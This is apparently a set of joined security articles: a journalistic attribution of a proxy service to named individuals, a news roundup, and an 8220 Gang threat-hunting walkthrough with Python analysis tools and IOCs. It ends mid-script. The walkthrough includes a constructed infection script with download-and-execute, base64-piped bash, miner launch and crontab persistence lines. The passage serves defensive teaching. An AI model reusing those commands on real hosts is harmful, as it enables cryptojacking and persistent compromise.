According to cyber intelligence firm Intel 471, the user BHProxies also used the handle “hassan_isabad_subar” and marketed various software tools, including “Subar’s free email creator” and “Subar’s free proxy scraper.”

Intel 471’s data shows that hassan_isabad_subar registered on the forum using the email address jesus.fn.christ@gmail.com. In a June 2012 private message exchange with a website developer on Black Hat World, hassan_isabad_subar confided that they were working at the time to develop two websites, including the now-defunct customscrabblejewelry.com.

DomainTools.com reports that customscrabblejewelry.com was registered in 2012 to a Teresa Shotliff in Chesterland, Ohio. A search on jesus.fn.christ@gmail.com at Constella Intelligence, a company that tracks compromised databases, shows this email address is tied to an account at the fundraising platform omaze.com, for a Brian Shotliff from Chesterland, Ohio.

Reached via LinkedIn, Mr. Shotliff said he sold his BHProxies account to another Black Hat World forum user from Egypt back in 2014. Shotliff shared an April 2014 password reset email from Black Hat World, which shows he forwarded the plaintext password to the email address legendboy2050@yahoo.com. He also shared a PayPal receipt and snippets of Facebook Messenger logs showing conversations in March 2014 with legendboy2050@yahoo.com.

Constella Intelligence confirmed that legendboy2050@yahoo.com was indeed another email address tied to the hassan_isabad_subar/BHProxies identity on Black Hat World. Constella also connects legendboy2050 to Facebook and Instagram accounts for one Abdala Tawfik from Cairo. This user’s Facebook page says Tawfik also uses the name Abdalla Khafagy.

Tawfik’s Instagram account says he is a former operations manager at the social media network TikTok, as well as a former director at Crypto.com.

Abdalla Khafagy’s LinkedIn profile says he was “global director of community” at Crypto.com for about a year ending in January 2022. Before that, the resume says he was operations manager of TikTok’s Middle East and North Africa region for approximately seven months ending in April 2020.

Khafagy’s LinkedIn profile says he is currently founder of LewkLabs, a Dubai-based “blockchain-powered, SocialFi content monetization platform” that last year reported funding of $3.26 million from private investors.

The only experience listed for Khafagy prior to the TikTok job is labeled “Marketing” at “Confidential,” from February 2014 to October 2019.

Reached via LinkedIn, Mr. Khafagy told KrebsOnSecurity that he had a Black Hat World account at some point, but that he didn’t recall ever having used an account by the name BHProxies or hassan_isabad_subar. Khafagy said he couldn’t remember the name of the account he had on the forum.

“I had an account that was simply hacked from me shortly after and I never bothered about it because it wasn’t mine in the first place,” he explained.

Khafagy declined to elaborate on the five-year stint in his resume marked “Confidential.” When asked directly whether he had ever been associated with the BHProxies service, Mr. Khafagy said no.

That Confidential job listing is interesting because its start date lines up with the creation of BHproxies[.]com. Archive.org indexed its first copy of BHProxies[.]com on Mar. 5, 2014, but historic DNS records show BHproxies[.]com first came online Feb. 25, 2014.

Shortly after that conversation with Mr. Khafagy, Mr. Shotliff shared a Facebook/Meta message he received that indicated Mr. Khafagy wanted him to support the claim that the BHProxies account had somehow gone missing.

“Hey mate, it’s been a long time. Hope you are doing well. Someone from Krebs on Security reached out to me about the account I got from you on BHW,” Khafagy’s Meta account wrote. “Didn’t we try to retrieve this account? I remember mentioning to you that it got stolen and I was never able to retrieve it.”

Mr. Shotliff said Khafagy’s sudden message this week was the first time he’d heard that claim.

“He bought the account,” Shotliff said. “He might have lost the account or had it stolen, but it’s not something I remember.”

If you liked this story, you may also enjoy these other investigations into botnet-based proxy services:

A Deep Dive Into the Residential Proxy Service ‘911’
911 Proxy Service Implodes After Disclosing Breach
Meet the Administrators of the RSOCKS Proxy Botnet
The Link Between AWM Proxy & the Glupteba Botnet
15-Year-Old Malware Proxy Network VIP72 Goes Dark
Who’s Behind the TDSS Botnet?

The Good, the Bad and the Ugly in Cybersecurity – Week 8

The Good

Russian national Dariy Pankov, the man behind the development and sale of the NLBrute password-hacking tool, was extradited to the United States this week. Known by the alias dpxaker, Pankov has been charged by U.S. officials with computer fraud and access device fraud, as well as one count of conspiracy.


According to the DOJ’s press release on his indictment, Pankov wrote the malware to compromise protected computers by decrypting login credentials. Using NLBrute, he went on to steal the passwords of tens of thousands of computers globally, re-selling the credentials on dark websites to other cyber criminals. Investigations have found that login credentials to more than 35,000 computers were sold by Pankov over a three-year period, garnering him over $350,000 in illegal earnings.

While active, Pankov marketed and sold NLBrute himself and through other actors who resold it on his behalf, spreading the tool widely among interested buyers. NLBrute has appeared in a range of malicious campaigns, including tax fraud schemes, credential brute-force attacks, and Ransomware-as-a-Service (RaaS) operations attributed to REvil, Dharma, and Netwalker.

Though Pankov faces a maximum of 46 years in federal prison if convicted on all charges, his tool is just one of many credential-hacking tools available on criminal markets. Credential theft continues to be a leading initial access vector, with threat actors targeting the vulnerable identity attack surface.

The Bad

Several versions of Carbon Black App Control for Windows are affected by a critical injection vulnerability reported this week by security researcher Jari Jääskelä. In its security advisory, VMware rated the vulnerability ‘critical’ with a CVSS score of 9.1 out of 10 and warned that an attacker leveraging the flaw could gain access to the underlying server operating system.

The flaw, tracked as CVE-2023-20858, requires an attacker who already holds privileged access to the App Control administration console; it does not grant that access. From that position, an attacker could use specially crafted input to bypass XML parsing restrictions, reach sensitive assets, or escalate privileges to the underlying server. Affected versions are 8.7.x up to and including 8.7.7, 8.8.x up to and including 8.8.5, and 8.9.x up to and including 8.9.3. There are no workarounds, and VMware has urged customers to upgrade immediately to 8.7.8, 8.8.6, or 8.9.4.

VMware’s Carbon Black App Control is used to lock down servers and critical systems, so compromising its management server puts an attacker on exactly the host that governs what those systems are allowed to run. The injection vulnerability could allow an attacker to execute unapproved commands, leading to complete compromise of the server and of the systems connected to it.

News of the injection flaw follows a rapid wave of ransomware attacks reported just two weeks ago that leveraged a two-year-old vulnerability in the OpenSLP (Service Location Protocol) service of VMware ESXi to compromise thousands of unpatched ESXi servers.

The Ugly

Organizations are racing to patch a remote code execution (RCE) vulnerability impacting multiple Zoho ManageEngine products. The vulnerability, CVE-2022-47966 (CVSS score 9.8), is being exploited by multiple threat actors, with the majority of victims located in the U.S., U.K., Canada, Australia, Italy, Mexico, Nigeria, Ukraine, and the Netherlands.

CVE-2022-47966 enables unauthenticated remote code execution through an outdated third-party dependency, Apache Santuario, which the affected products use for XML signature validation. Unauthenticated attackers have exploited the flaw to completely take over roughly two dozen Zoho on-premises products, move laterally, and deploy tools such as Cobalt Strike and Netcat. In this week’s attacks, threat actors were seen installing AnyDesk or a Windows version of Buhti ransomware after gaining initial access.


Zoho has since published a security advisory detailing all affected products, versions, and fixes, and notes that the exploit works only if Security Assertion Markup Language (SAML) single sign-on (SSO) was enabled on the product at the time of the attack (for some products, if it had ever been enabled). Used most commonly by large enterprises to streamline the employee login experience, SAML SSO remains a lucrative target for threat actors seeking high-value payouts.

Based on security researchers’ findings, between 2,000 and 4,000 servers running ManageEngine products are reachable from the internet, a wide attack surface for opportunistic attackers. Organizations are urged to patch immediately and to implement continuous monitoring and detection capabilities.

Feature Spotlight | Integrated Mobile Threat Detection with Singularity™ Mobile and Microsoft Intune

SentinelOne is pleased to announce the launch of an integration between Singularity™ Mobile and Microsoft Intune. Singularity Mobile is a Mobile Threat Detection (MTD) solution built on the SentinelOne XDR Platform.

It detects threats on iOS and Android devices, combating mobile phishing and enforcing zero trust on infected or risky devices. With the Microsoft Intune connector for SentinelOne, users can easily deploy, sync, detect, and respond with MDM and MTD working together.

Mobile Attacks Are On The Rise

Credential theft via SMS phishing led to hundreds of enterprises being breached in 2022. Mobile attacks are on the rise with mobile malware now one of the fastest growing malware types. While ransomware has dominated a decade of attacks, access to data has become an equally important goal for attackers.

Mobile devices provide an easier attack surface for phishing campaigns and enjoy a level of access to enterprise assets now approaching that of workstations. To thwart this barrage of attacks with minimal overhead, enterprises want mobile security to work with mobile management.

Singularity Mobile and Microsoft Intune elevation of privilege

An Integrated Solution to Mobile Security

Connecting Microsoft Intune and SentinelOne is simple and game changing. Setup is as simple as a few clicks to cross launch and authenticate. Once connected, the two consoles begin syncing selected device groups, making it easy to deploy and begin setting up conditional access policies based on risk level.

Risk will be shared at the cloud and agent level and all access decisions will be automatic, making daily management largely autonomous.

Singularity Mobile and Microsoft Intune detection policy

This integrated approach to mobile differentiates Singularity Mobile from the competition. While other endpoint vendors offer mobile solutions, none invest as deeply in an integrated approach. Not only can mobile be managed end to end from the same platform as Windows, Mac, Linux, and Kubernetes protection, SentinelOne has invested in multiple MDM partnerships for better detection and response and flexibility in MDM vendors.

Singularity Makes Mobile Security Seamless

The Singularity mobile agent and Microsoft Intune console combine to make mobile security seamless. End users are notified of malicious apps, networks, phishing links, and advanced attack detections. Phishing is stopped in real time.

Singularity Mobile and Microsoft Intune threats and alerts

When a device stays in a risky state, it loses access. When the user uninstalls the malicious app or disconnects from the malicious network, access is automatically restored. Detections of system-level attacks leave the device in a risky state until a SOC analyst can investigate and remediate the threat.

These flows give users visibility into threats and risks, protect credentials, and limit attack paths, while only rarely requiring analyst action.

Integrating Mobile Security with Open XDR

With the launch of this Microsoft integration, SentinelOne also expands its native and open approach to XDR. While SentinelOne mobile threats and risks already enrich workstation threats, mobile risk and threats will now be informed by Intune’s device visibility. By bringing Intune data into the platform, security teams gain a better view of each device and the environment.

As Singularity Mobile is an integrated part of the SentinelOne console, mobile devices will only further benefit from SentinelOne’s platform approach to XDR as investment into XDR capabilities continues.

Singularity Mobile and Microsoft Intune suspicious android app

Correlation and automation are driving the platform to new and differentiated levels, so mobile threats triaged in the platform benefit from capabilities such as the investigation flows in Skylight and the no-code automations available in the Singularity Marketplace.


With the market investing in mobile security like never before, SentinelOne is excited to offer customers a differentiated, integrated, easy-to-manage solution to combat mobile phishing, malicious apps and networks, and vulnerability detection by combining those capabilities with the world’s largest MDM.

To learn more about how SentinelOne can help secure all endpoints, cloud and identity across the enterprise, contact us or request a demo.


SOC Team Essentials | How to Investigate and Track the 8220 Gang Cloud Threat

8220 Gang is a low-skill crimeware actor known for infecting cloud hosts through n-day vulnerabilities and remote access brute forcing. We have previously detailed how 8220 expanded its botnet and rotated its infrastructure. Since our last write up in October, the group has again switched to new infrastructure and samples, providing us with an opportunity to share an educational walkthrough of the process of investigating cybercrime activity that may be useful to new or lesser experienced SOC teams, analysts and researchers.

In this post, we use 8220 Gang activity as a lens through which to explain the process of investigating a threat, researching the threat activity as a whole, and gaining a perspective into attacker objectives, ultimately concluding with a wider understanding of related threat intelligence.

Refresher on 8220 Gang

8220 Gang (pronounced eighty-two twenty), also known as 8220 Mining Group, was first publicly reported by Talos in 2018. Victims of 8220 Gang are typically, but not exclusively, users of cloud networks operating vulnerable and misconfigured Linux applications and services.

Attacks make use of SSH brute forcing post-infection to automate local and global spreading attempts. Victims using cloud infrastructure (AWS, Azure, GCP, Aliyun, QCloud) are often infected via publicly accessible hosts running Docker, Confluence, Apache WebLogic, and Redis. Victims are not targeted geographically but simply identified by their internet accessibility.

Initial Discovery

Our walkthrough starts with the initial discovery of an interesting script found on a compromised AWS machine whose SSH service was exposed to the internet and protected by weak credentials. For readers not running a honeypot, the same discovery could have been made by monitoring new files uploaded to file-scanning services such as VirusTotal or MalShare. For those looking to monitor this group, geographically distributed SSH honeypots plus VirusTotal YARA rules offer a reliable method of catching new activity as it occurs.

The script in question has the SHA1 a9da0947243333d95f84f6a0e37b9fc29b2fb054.

8220 Infection Script Snippet

We can see it is quite simple in design, built around downloading some other file and setting up persistence for it.

With a few string pivots inside VT, or even a few Google searches, we can quickly discover the core functionality of the script has been widely reported on as it has been reused by many amateur cryptocurrency mining groups and opportunistic profit-seeking attackers.

Pivoting on part of the script’s content in VirusTotal Intelligence

One example of such reporting is our July 2022 post on 8220 Gang expanding their botnet to roughly 30,000 hosts. However, this time the attacker-specific infrastructure is different, and we have not determined if it has delivered similar malware. Remember, this “infection script” is used by many attackers, and it alone is a very weak source of attribution.

8220 Infection Script Analysis

The script goes through a set of instructions, often several layers of encoded commands deep, aimed at establishing persistence on the victim machine by re-downloading itself from malicious servers. The multiple layers of Base64 encoding also hide the fact that it downloads a specific payload; this is first observed in the createservices function.

Infection Script createservices Function

One difference quickly apparent compared with past reporting on the script is that the attacker has added the lwp-download command (the Perl LWP command-line downloader) as a fallback for when neither wget nor curl is available. We first observed this on January 6th, and the actor has since standardized it in their infection scripts. Sysdig also noted this activity in a recent blog.

Infection Script use of lwp-download

The key takeaway from analyzing these infection scripts is to note unique additions, like lwp-download, together with the destinations of the download requests. By clustering infection scripts on function names and their order, on whether those functions are actually called, and on the infrastructure they reach out to, we can weed out samples that are not 8220 Gang.

Additionally, we can link the script to past 8220 Gang samples by the number of encoding layers and the way they repeat. For example, in our infection scripts createservices makes use of three base64-encoded echo commands. The first decodes to a new script that pings associated attacker infrastructure and then starts a “payload” command.

Infection Script’s encoded payload

The payload contains two additional base64 encoded scripts to set permissions, download, and configure miner and IRC bot infections. This functionality communicates with 194.38.23[.]170.
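The decode-and-cluster workflow described above can be automated. The Python below is an added example written for this page, not SentinelOne’s tooling, and it runs against a constructed script that copies the structure the post describes (a download function with wget, curl and lwp-download fallbacks, and a createservices function with nested base64 echo pipes) using RFC 5737 documentation addresses and example.test names instead of the real 8220 sample. It peels every base64 layer, extracts the infrastructure each layer contacts, and builds a fingerprint from function order and downloader chain that can be used to group scripts and weed out non-8220 samples.

```python
"""Peel and fingerprint an 8220-style infection script (added example; not
SentinelOne's code). The sample below is CONSTRUCTED to mirror the structure
described in the post (download function with wget/curl/lwp-download fallback,
a createservices function with nested `echo <b64> | base64 -d | bash`); it is
not the real script, and all hosts are RFC 5737/6761 documentation values."""
import base64
import re


def _enc(text: str) -> str:
    return base64.b64encode(text.encode()).decode()


# Innermost layer: fetch the miner and point it at an "FBI"-themed pool.
_LAYER2 = ("download http://198.51.100.7/x86_64 /tmp/x86_64\n"
           "chmod +x /tmp/x86_64\n"
           "/tmp/x86_64 -o fbi-pool.example.test:443 --donate-level 1\n")
# Middle layer: ping attacker infrastructure, then run the payload.
_LAYER1 = f"ping -c 1 203.0.113.10\necho {_enc(_LAYER2)} | base64 -d | bash\n"

SAMPLE_SCRIPT = f"""#!/bin/bash
download() {{
    if command -v wget >/dev/null; then wget -q -O "$2" "$1";
    elif command -v curl >/dev/null; then curl -s -o "$2" "$1";
    else lwp-download "$1" "$2"; fi
}}
createservices() {{
    echo {_enc(_LAYER1)} | base64 -d | bash
    (crontab -l 2>/dev/null; echo "* * * * * $0") | crontab -
}}
download http://198.51.100.7/dl.sh /tmp/dl.sh
createservices
"""

B64_PIPE = re.compile(r"""echo\s+["']?([A-Za-z0-9+/=]{16,})["']?\s*\|\s*base64\s+(?:-d|--decode)\b""")
FUNC_DEF = re.compile(r"^\s*(?:function\s+)?([A-Za-z_]\w*)\s*\(\)\s*\{", re.M)
DOWNLOADER = re.compile(r"\b(wget|curl|lwp-download)\b")
URL = re.compile(r"""https?://[^\s"'|;)]+""")
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
DOMAIN = re.compile(r"(?<![\w/.])(?:[a-z0-9-]+\.)+[a-z]{2,}\b")


def peel(script: str, depth: int = 0, max_depth: int = 8):
    """Yield (depth, text) for the script and every base64 layer beneath it."""
    yield depth, script
    if depth >= max_depth:          # refuse to recurse forever on hostile input
        return
    for blob in B64_PIPE.findall(script):
        try:
            inner = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:           # binascii.Error is a ValueError subclass
            continue
        yield from peel(inner, depth + 1, max_depth)


def analyze(script: str) -> dict:
    """Decode every layer and pull out what the post says to cluster on:
    function names in definition order, downloader fallbacks, and the
    infrastructure the script reaches out to at any depth."""
    layers = list(peel(script))
    all_text = "\n".join(text for _, text in layers)
    downloaders = list(dict.fromkeys(DOWNLOADER.findall(all_text)))   # ordered, unique
    return {
        "functions": FUNC_DEF.findall(script),
        "downloaders": downloaders,
        "max_depth": max(d for d, _ in layers),
        "iocs": {
            "urls": sorted(set(URL.findall(all_text))),
            "ips": sorted(set(IPV4.findall(all_text))),
            "domains": sorted(set(DOMAIN.findall(all_text))),
        },
    }


def fingerprint(report: dict) -> str:
    """Cluster key: same function order + same downloader chain = same template.
    Infrastructure is deliberately excluded so it can be compared separately."""
    return ">".join(report["functions"]) + "|" + ",".join(report["downloaders"])


if __name__ == "__main__":
    r = analyze(SAMPLE_SCRIPT)
    print(fingerprint(r))   # download>createservices|wget,curl,lwp-download
    print(r["iocs"])
```

Keeping the template fingerprint separate from the extracted infrastructure is what lets the analyst do what the post describes: many unrelated miners share the template, so the fingerprint alone is weak attribution, while the same template plus infrastructure that overlaps known 8220 hosts is a much stronger link.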

Post-Infection Activity & Sample Pivots

The post-infection activity for this and other recent 8220 infection scripts varies slightly, but generally proceeds to infect the victim with an updated PwnRig cryptocurrency miner and an IRC bot.

In the infection scripts we observed in this campaign, the group continued to deliver the old “Tsunami” IRC bot (dropped under the file name bashirc.x86_64). The sample itself is unchanged; only the network it communicates with changes from campaign to campaign. The infection script here delivered 472548a4b8295182f6ba8641d74725c2250b7243, the Tsunami sample.

More useful for tracking 8220 Gang are the PwnRig samples they drop, a custom build of the open-source XMRig cryptocurrency miner. In this campaign, the script downloads the UPX-packed sample 38be55f1fc4ce1cb5438236abc5077019e5e1cdf, which unpacks to 332485bd460f55117a254f8164736b90d74aa9f6. A characteristic of 8220 Gang is the repeated use of fake mining pool domains themed around the FBI; here the theme appears again in the malicious domain fbi.su1001-2[.]top.

Infrastructure Analysis

Tracking 8220 Gang is aided by their poor infrastructure OPSEC. Since the beginning of what the industry calls “8220 Gang”, the primary method of attribution has been reused infrastructure and the identification of newly associated infrastructure. This technique alone does not link the actor with certainty, but it remains reliable when combined with the overlaps in delivered malware samples noted above.

During our initial investigation in January, the group was using 185.106.94[.]146 and dw.bpdeliver[.]ru as post-infection malware download locations, for example in the infection script. Anyone looking into this group should pivot on every subdomain associated with the actor-controlled domain and on the full DNS history of the malicious IPs to uncover a wider set of activity.

For example, the recent dw.bpdeliver[.]ru host resolved to 79.137.203[.]156 during the initial deployment of the script, and more 8220 Gang scripts can be found calling that IP directly rather than the domain. The same goes for 185.106.94[.]146, which the script calls by IP and which at the time resolved to jira.letmaker.top, a widely reported 8220 Gang domain.
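The pivot recommended above (every subdomain of an actor domain, plus the full DNS history of each IP) is a graph walk over passive-DNS records. The Python below is an added example for this page, not SentinelOne’s code, and runs offline over a constructed record set: the two resolutions the post reports are included as edges, and everything else uses RFC 5737 documentation ranges and example.test names and is invented to show how the walk expands. It accepts the defanged [.] notation used in the post, and it applies the check a practitioner needs: stop pivoting through an IP or base domain that fronts dozens of unrelated names, otherwise shared hosting, CDN or sinkhole addresses pull unrelated infrastructure into the cluster.

```python
"""Pivot through passive-DNS history to grow an infrastructure cluster from a
few seed IOCs (added example; not SentinelOne's code). The record set is
CONSTRUCTED: the first two (name, ip) pairs are the resolutions the post
reports; everything else uses RFC 5737/6761 documentation values and is
invented to show how the walk expands and where it must stop."""
from __future__ import annotations

import ipaddress
from collections import defaultdict, deque

PDNS_RECORDS: list[tuple[str, str]] = [
    ("jira.letmaker.top", "185.106.94[.]146"),   # stated in the post
    ("dw.bpdeliver[.]ru", "79.137.203[.]156"),   # stated in the post
    # --- constructed from here on ---
    ("dl.bpdeliver.ru", "198.51.100.20"),        # sibling subdomain, new IP
    ("pool.example.test", "198.51.100.20"),      # shares that IP
    ("jira.letmaker.top", "198.51.100.33"),      # an older resolution
    ("x.letmaker.top", "203.0.113.1"),           # lands on a crowded host
] + [(f"site{i:02d}.example.test", "203.0.113.1") for i in range(30)]

SEEDS = ["185.106.94[.]146", "dw.bpdeliver[.]ru"]


def refang(indicator: str) -> str:
    """Turn the report-safe '[.]' form back into a real name or address."""
    return indicator.replace("[.]", ".").lower()


def is_ip(node: str) -> bool:
    try:
        ipaddress.ip_address(node)
        return True
    except ValueError:
        return False


def base_domain(name: str) -> str:
    """Crude registrable-domain guess (last two labels). Use a public-suffix
    list in real tooling; co.uk-style suffixes break this heuristic."""
    return ".".join(name.rstrip(".").split(".")[-2:])


def pivot(seeds, records, max_hops: int = 3, max_fanout: int = 25) -> dict[str, int]:
    """Breadth-first walk over name<->IP edges plus same-base-domain edges.
    Returns {node: hop distance from the nearest seed}.

    max_fanout is the practitioner's caveat: an IP that fronts dozens of
    unrelated names (shared hosting, CDN, sinkhole, parking) or a base domain
    with dozens of subdomains is not actor-controlled infrastructure, and
    pivoting through it drags the whole internet into the cluster."""
    names_by_ip: dict[str, set[str]] = defaultdict(set)
    ips_by_name: dict[str, set[str]] = defaultdict(set)
    names_by_base: dict[str, set[str]] = defaultdict(set)
    for name, ip in records:
        name, ip = refang(name), refang(ip)
        names_by_ip[ip].add(name)
        ips_by_name[name].add(ip)
        names_by_base[base_domain(name)].add(name)

    dist = {refang(s): 0 for s in seeds}
    queue = deque(dist)
    while queue:
        node = queue.popleft()
        if dist[node] >= max_hops:
            continue
        if is_ip(node):
            neighbours = names_by_ip[node]
        else:
            neighbours = ips_by_name[node] | names_by_base[base_domain(node)]
        if len(neighbours) > max_fanout:      # too noisy to be actor-controlled
            continue
        for nxt in neighbours:
            if nxt not in dist:
                dist[nxt] = dist[node] + 1
                queue.append(nxt)
    return dist


if __name__ == "__main__":
    cluster = pivot(SEEDS, PDNS_RECORDS, max_hops=4)
    for node, hops in sorted(cluster.items(), key=lambda kv: (kv[1], kv[0])):
        print(hops, node)
```

With the constructed records, the walk reaches the sibling subdomain, the second resolution of jira.letmaker.top and the host they share, but refuses to expand 203.0.113.1 and example.test because each fronts more than 25 names, so the thirty unrelated site*.example.test entries never enter the cluster.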

Overall, the group is clumsy and unsophisticated in their infrastructure management, providing a good opportunity for those willing to track the mess or cut their teeth in threat actor investigation.

Our graphic from a previous campaign explains the overlap, which can still be found in this most recent activity.

Visual Context of 8220 Gang Infrastructure Roles


Tracking and researching 8220 Gang, which has consistently exhibited a lack of operational security, requires only a basic understanding of their malicious scripts, malware samples, and infrastructure. A successful approach involves monitoring and analyzing delivered samples, identifying recurring patterns in the infection scripts, and mapping the infrastructure they call out to.

Indicators of Compromise

Indicator                                   Description
a9da0947243333d95f84f6a0e37b9fc29b2fb054    8220 Gang install script
472548a4b8295182f6ba8641d74725c2250b7243    8220 Gang bashirc.x86_64, packed; old “Tsunami” IRC bot
38be55f1fc4ce1cb5438236abc5077019e5e1cdf    8220 Gang x86_64 miner, packed; uses fbi.su1001-2[.]top
332485bd460f55117a254f8164736b90d74aa9f6    Unpacked PwnRig miner (38be55f1… unpacked)
jira.letmaker.top                           8220 Gang infrastructure, reused
dw.bpdeliver.ru                             8220 Gang infrastructure, recent
fbi.su1001-2.top                            8220 Gang infrastructure, recent

Staying Secure In the Cloud | An Angelneers Interview with Ely Kahn

Cloud computing has allowed modern organizations to scale at incredible rates, transforming how organizations collaborate and operate. While cloud adoption grows across all industries, its inherent risks have expanded alongside it. This steers security leaders towards implementing the right cybersecurity strategies to protect their cloud environments.

In the latest Angelneers podcast episode, host Oleg Sullivan Koujikov spoke with SentinelOne’s VP, Product Management for Cloud Security, Ely Kahn, about the realities of using cloud computing, the three main cloud-based attack vectors, and the rise of cloud native application protection platforms (CNAPPs) in combating threat actors who continue to take aim at this fast-growing attack surface. In this post, we share Ely’s main takeaways for staying secure in the cloud.

Growing Threats Organizations Face in the Cloud

Koujikov: Today, in 2023, many business organizations have completely migrated computing resources to the cloud and other companies are still working to migrate over to the cloud. It seems we are trending in this direction and threats are also growing in cloud computing. Can you talk about some of the cloud security issues and threats organizations face as this larger trend towards cloud computing is adopted?

Kahn: The first thing to remember with cloud security is what people use the cloud for. Organizations are using the cloud to host web applications and store their data. Oftentimes, this is time-sensitive data or business-critical web applications that are generating tens, if not hundreds of millions of dollars of revenue.

With this in mind, the real goal of cloud security is to defend those applications and the underlying infrastructure that they sit on in the cloud. Given that there are these applications in the cloud processing sensitive data like personal health information, personally identifiable information (PII), or credit card information, they attract adversaries who want to either steal that information, resell it on the dark web, or use it to conduct a ransomware attack. Adversaries then extract money from a victim company that is trying to unbrick an application that has been encrypted in that ransomware incident.

3 Common Cloud-Based Attack Vectors

Kahn: Adversaries or threat actors are conducting these attacks using one of three ways as their initial access. The following are stack ranked in relative frequency.

1. Misconfigured Resources

Number one on the list is misconfigured resources and, specifically, cloud resources that are made publicly accessible to the internet. For example, if I am using an S3 bucket, Elasticsearch cluster, or another type of cloud database and I accidentally misconfigure it so that it is publicly accessible from the internet when it shouldn’t be, I will be breached within minutes.

There are adversaries continuously scanning the internet and AWS IP ranges for any type of resource that is exposed to the internet. Suppose that resource contains sensitive data or connections to other resources through overly permissive identity roles or permissions. This is a classic way in which organizations experience cloud breaches.

2. Compromised Access Keys

With cloud providers, there’s the concept of access keys. On one hand, think username and password-type access keys and, on the other, there are ephemeral access keys. Ephemeral access keys are always the recommended way for setting up your access through identity access management (IAM) roles instead of IAM users. Roles have ephemeral access keys; users have long-lasting access keys.

The long-lasting access keys can get compromised in a number of ways. They can get stolen, people can hard code them and then find that the code repos are made public. Essentially, finding access keys and then using them to access cloud accounts is the second most common cloud-based risk organizations face.

3. Vulnerable Web Applications

As mentioned before, people are using cloud computing to host web applications from cloud providers. Those web applications could have exploitable vulnerabilities associated with them. For example, a company may be using a version of WordPress that has a bad or corrupted plug-in that can be exploited, or a form on their application is subject to SQL injection.

There are several ways to protect applications from these types of vulnerabilities. You can scan the application vulnerabilities, or put a web application firewall in front of them to limit the malicious actions that can be taken against them. However, once a threat actor has gotten in through that front door, they are able to move laterally and conduct various types of cloud attacks.

Koujikov: To summarize these three main cloud-based attack vectors, we can say it’s like one: you left open a door, two: someone got a key, or three: they went right through the front door.

Kahn: Exactly, and maybe broke a window in the process!

Understanding Hybrid & Multi-Cloud Risks

Koujikov: Next, can you talk about the growing hybrid cloud approach? It implies that services and applications that can be hosted are configured locally and could be migrated to a cloud. Can you talk about the proliferation of hybrid and multi-cloud security?

Kahn: Let me break these down a little bit: What does multi-cloud mean? Multi-cloud means that you’re actually using multiple cloud providers, for example AWS and Azure, to host your workloads. Rarely is the same application being used across multiple cloud providers. More often, organizations are picking one cloud provider for one type of workload and another cloud provider for another type of workload, because they really like its capabilities in a particular area. Back to the example, perhaps an organization is using Azure for its machine learning, but then using AWS for everything else.

With hybrid cloud, this refers to organizations that store some of their data in a public cloud environment while simultaneously running other applications within their own on-prem environment, which could be a private cloud environment. What’s interesting from a security perspective is the idea that security incidents can actually start on-prem and then move into the cloud, or vice versa. So, right now, I would say that most security solutions are relatively stovepiped, meaning they only focus on cloud security or they only focus on on-prem security.

Because of that stovepipe-like focus, many security solutions potentially miss these pivots between on-prem and cloud environments. This limits your ability to really, truly understand the full scope of an attack or the full scope of an incident.

As an example, a user could accidentally enter credentials in a malicious website linked from a phishing email. An adversary would then use those credentials to log into their machine. From there, actors could use privilege escalation techniques to acquire admin credentials or find existing admin credentials on the compromised machine. Say those admin credentials are cloud admin credentials.

With that access in hand, the threat actor could log into the cloud and perhaps create a new user for themself that has permissions to complete the rest of their mission in the cloud. From the point of view of a threat actor, I’ve just pivoted from your laptop into the cloud environment and I’m executing nefarious actions there.

For security leaders today, what’s important is to put all of these pieces together into a larger storyline – a unified view that cuts across both on-prem and cloud environments.

How Cloud Native Application Protection Platforms (CNAPPs) Can Help

Koujikov: Is that why there’s an interest in cloud native application protection platforms (CNAPPs)?

Kahn: “Cloud native application protection platform” is a term coined originally by Gartner, but used widely throughout the industry now. Going back to the idea of stovepipe-like connections between on-prem security and cloud security, there’s lots of specialization. Alternatively, the idea of CNAPPs begins to merge various cloud security tools into a more unified platform itself.

To completely and fully defend the cloud, organizational leaders need application security tools that can ensure the integrity and the security of the code associated with the applications that they’re deploying to the cloud. They need security tooling to look at the development and deployment pipelines for that code.

When code is developed, it goes through a series of tests moving from beta to production environments. That pipeline itself needs to be secure. Using the case of the SolarWinds attack, Russian-linked threat actors were found to have injected code into the SolarWinds code base via their development and deployment pipelines. Since then, that’s really keyed in the idea that the pipeline itself needs to be secure for the rest of the community.

Once you deploy that code into your cloud environment, you need to make sure that the outer perimeter of that cloud environment is secure by putting in place network firewalls and web application firewalls. Security leaders need to also be looking at the infrastructure that the code is running on and monitoring that infrastructure, including virtual machines, containers, databases, and the identities being used. Monitoring for misconfigurations, anomalies, and signs of adversary behavior needs to happen for all of those aspects of cloud computing.

The vision for CNAPP is uniting all these things together so that you can have a clear line of sight. CNAPP gives us the ability to see malware that’s sitting on a machine in your cloud environment as well as visibility all the way back to the initial code repo that contains the instructions about how that machine should be deployed. This visibility translates to the ability to go back to the beginning and make sure that any misconfigurations in that initial deployment code are cleaned up.
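The laptop-to-cloud pivot described in the interview above (phished credentials, cloud admin credentials found on the host, a new cloud user created for persistence) can only be seen as one incident if host and cloud telemetry are joined. The following is an added example, not code from the interview, from SentinelOne, or from any CNAPP product: it takes a constructed endpoint credential-theft alert and constructed CloudTrail-style records, flags a CreateUser that is followed within a short window by an admin policy attachment for the new user, and joins that finding to the host alert by user name into a single storyline. The record fields follow CloudTrail's shape but are reduced; the admin policy list, the two time windows, and the assumption that the endpoint user name matches the IAM user name are all assumptions to tune.

```python
"""Join an endpoint credential-theft alert to cloud IAM persistence events.

Added example (not from the interview or any vendor). Event shapes are
simplified CloudTrail-style dicts and all sample data below is constructed.
"""
from __future__ import annotations

from datetime import datetime, timedelta

# Assumption: the AWS-managed AdministratorAccess policy marks an admin-equivalent grant.
ADMIN_POLICY_ARNS = {"arn:aws:iam::aws:policy/AdministratorAccess"}
# A CreateUser followed by a privilege grant within this window counts as one sequence.
IAM_SEQUENCE_WINDOW = timedelta(minutes=30)
# Cloud activity starting this long after a host credential-theft alert is joined to it.
CORRELATION_WINDOW = timedelta(hours=6)


def _ts(s: str) -> datetime:
    """Parse an ISO-8601 timestamp with a trailing Z into an aware datetime."""
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


# Constructed endpoint (EDR) alert: credential dumping on jdoe's laptop.
ENDPOINT_ALERTS = [
    {"time": "2023-02-14T09:02:00Z", "host": "laptop-42", "user": "jdoe",
     "technique": "OS Credential Dumping"},
]

# Constructed CloudTrail-style records, reduced to the fields the logic reads.
CLOUD_EVENTS = [
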